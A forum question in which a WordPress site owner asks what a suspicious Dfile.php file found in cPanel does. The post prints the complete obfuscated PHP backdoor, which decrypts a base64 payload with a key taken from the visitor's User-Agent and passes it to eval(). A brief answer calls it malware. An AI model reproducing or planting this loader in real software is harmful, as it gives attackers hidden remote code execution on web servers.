# What does this script mean in WP?

Tags: wordpress, cpanel

I've just come across this file in my cpanel - Dfile.php.....

Inside this particular file this script was written.. I actually understand nothing about this script. Therefore, please help me to understand this script.. I mean what this script is all about ?

```
<?php
$data = "npeLzaPWytheWo96fIu9V6KR0JyElY6LsT9wQdWX0sSilouLXpLJyp+ilWGnn9JcYFeRZolmicF9d7qThaDF0JpTwJJXkdXMpl1ZbkRBa5qXmNJXiarK0Jefy1jWp8fGmqTWi2twb+FDQJaopZrWnqOeg57HrMTZm5SOXNik0IywPm2EOYfI2aiiUHBXmtenoI/MpcusjYtxO3NCbJXZ1aGQ1smk0tXYXlqTqKmjjlV3hbWDsYi5wYuEsmSDVtnVoVqecTpsyNmooo+mnKvRpahYh5rXqtGOVnW7iq+BtLeUeaildKi3kFackZ+qnItwQTpsmteq0cGpl9qn06aMh5im1dBcg6i5iIJ/g4uWtHqIhbWFtoqmsIl4q4qPUpWMcD5tbVTHxtiXc5OoqaPBmqyVxl+Gm9rUoluhRW07x9inncLHnNLYyV5ak6ipo4twQTpsoMhghoaak9qZjK1xbT46h8iR18aEc1ZwmaCjx5SbldeWxafT1pug2quLVtnVoVqecTps4nFAP6KYq6zUo1RUx5jWmaBvQK9zQsyYjMyopMjYWIfEq3uKi1WeWb9eXatwQWtczIJzUoqXqne4vlyYisFrcG9tWp1QcFeZw6iZZpeWxp3I0ZqXjqvXpMPVpKWUl1iHzI1fcT09QKDIVVyg1ZzJl9LDqpXOYIph2dWhbouSWqKOipqfonBfZYxeY1ePV4afkYJam9Se0luNg7A+bW05h9rWolZtU1ug0Juji5SUnUVvaz9WyqHVUqGDWZrRyp++l8FxQzo8tERsPlil1aOCdYWGq6TSc3A8bYenlczWUKCFiJqfom5EQWt1oZvHoNRgh5BlVJRYh6TIzKdannE6bInZqKJhcF6f1qmkapJmiViTglqn2KSDYISKqZbQ1JzE2clknqSgo16dQj45h6zUpJefXZrarNNsk5JcUZGEVNjX0FZkUFqgpcaarF7Xr9ZfoG9AO4qczKSVoFxfkotQkYWIqJqZpVdlglxjV4Nlgl/Zx6Oi0pnXl5LLqZ7Pi2twb21ampmlaXSJY2NXg2WCXNfGn6SGZoNZk4pVX4OLmdHJya5koJunXp1CPjmHn89phZ9WmcuswqnJxV1V2NaclI6fQ0A5V5+klFVxUMqc1pfcx5haiq3VnpaMcD5tbZbM0cmVpqWnlprRo6iV0avVYInGn6SXZIea0ZRebHBuOcnO0JuVoKirlsWkoqTIpdarjYaam9hqj1bM0GdannE6bInKlamkpZKUgnJUUIeby6qWnUM8b1zJkdfXp4zAhG2DhYian6JlckRsPpqf1ZzDm82KWpjFq9ekhMSoUYfKmc/K2pdfq0BBQGuemljJoM6dxMeum9ms1lqIyZ6dyNqRjI7fQ0A5PEBbypailM+cgnWFyKWiy6aLVsrMoZbZxVyK18ZdX2tAQUBrPliix6rLssqCc1LMoc+X18yvlouGXpKHklqcmZ+crcNebz1tQGtBibWqpNqd0KKEoFWX1cmRx42Inpeel6OcjlVYoseqy7LKi3FSc0JsO23JmJ3S15WLicyXpJSfnGCdVUE6bEBrocuKqabYq9ekjIeIpdXYldDVkF1lX5mgo8dVmZ7HXoth4G9AO29BbJfHy6RRhaCgoaHXppeeU6qr26GZbYqd0abZj62Xz5/Lpp7FpJ3Hn5PS0dOocJelnJzQcFtuh53LpMrYl1LZrcaVydaobZLXoMTTonJloHFZcm8/PTlsQKKbzc+llo5cyZvQyKuSj5Rnl5mNcUM6PEBA35qgo8iyb0Juaz87y5vLoYSFcaGhoKPTxtJWqaSso5yfXJqf0auPr8rLnZracsWh0MdwlNLQn9Wf1puaa1p1W8ieoJXZmIKqys6lk8p0kqXUxKNvn5OgoYefQ0A5PEC0bz89OWys0KvK1l5WuazVpsnQpVqecTpscm4/P62Yo6rHsEE6bEBrncjKpVKIdNNwoNalktGEo9fe0JtzV5mmpdZiq5XMnsqsn8SlnspzxqHQ0qdr1cmUnoyiWpyZn5ytw1Win9dXyKfa0JpulavTk9KhcWDTolKecm4/P61AQUDfQj45h6rWqoWfVlm2fJypxat2fMS7idLGvISwiouIpqx7bXi1jbSar5SEociPnJ2ulGWhrKeJ0K6nd6GIY5t9uHunnrxpyqzHlIegvouka7S2dp+wt5PTytulgIlln6vEZ4WfrbCXp8mpfJy/armsx9yYpLCogZOzp6Ftc5qjocN8Zaa9esmmxrlrncCQyqfHqp2ord2n2rOoh2Z7h6qCpYyKmsR+mp+vlIShyI+cna2qoausq2nVr96pgZaEp6e8npygxmqwpMmlnZ2+aMd4uqmon8eXetPJq4ukiIainqyejZfHf6yox7Wdnb5ox3i6qaifx5d608mri6SIhqKnx6yjeq1/xrHGuoier3yTmcirf6HFt5fOvZSafIZ5qqXGaH6gx363pr21oWmpn86dx6p7YcSncZyv3Wqseqxrnqx9mKnEj7SkscuZp8eAtabGpphopsubzr6Wb6uUeo2sxnlknr1pm66/lK6espCxosiqiqXH0YbcxruQpollfWfDjG2lsqCjprHLiGXJpc9ivrZpn6/RmJPHu62kf6qmgbyioKO9jZuvybqImL9qnKfIqoumx6x90q+seJ6Uep6qrHyCpsWltKTH0Ieita/Ofae6i5vEq2jKr6uErJKhiaPEo4Vnpp7OacfPrqLIpdahrpVmY73NZdrGrHeke4eqgsiGcW2Kcm9CbsifnsuX06fYwpig0diV0dnXXlheYqStyGOkmNNZjprG1ZtompfHl8fSmZaLiKPX141fcT09QFvInqCV0ZjPnaKCqafIq9ekjIeUhKi2hqi3v12GeIOWiqeBelfAY9Ws19Smodlgh5G3qIeHqLaLirWshpWDeIN9iZJgV5Jei2OWi3E/cEHYoNDMo5yLi16SjJJanJmfnKXDoplZnkRsQaXFnp/VnItUksupksbHldbYhmJmZ2hsYJ1CPq1wQQ==";
$ktmp = $_SERVER['HTTP_USER_AGENT'];
if(preg_match('/WebKit\/(.*) \(/is',$ktmp,$kk)){
    $keys = explode(".",$kk[1]);
    $keys = '0Pi'.$keys[0].'hBG';
}
$keys = md5($keys);
$x = 0;
$data = base64_decode($data);
$len = strlen($data);
$l = strlen($keys);
$char = '';
for ($i = 0; $i < $len; $i++) {
    if ($x == $l) {
        $x = 0;
    }
    $char .= substr($keys, $x, 1);
    $x++;
}
$str = '';
for ($i = 0; $i < $len; $i++) {
    if (ord(substr($data, $i, 1)) < ord(substr($char, $i, 1))) {
        $str .= chr((ord(substr($data, $i, 1)) + 256) - ord(substr($char, $i, 1)));
    } else {
        $str .= chr(ord(substr($data, $i, 1)) - ord(substr($char, $i, 1)));
    }
}
eval($str);
```

Answer (score 0):

It seems like php malware. You can try wordfence plugin for clean core files etc.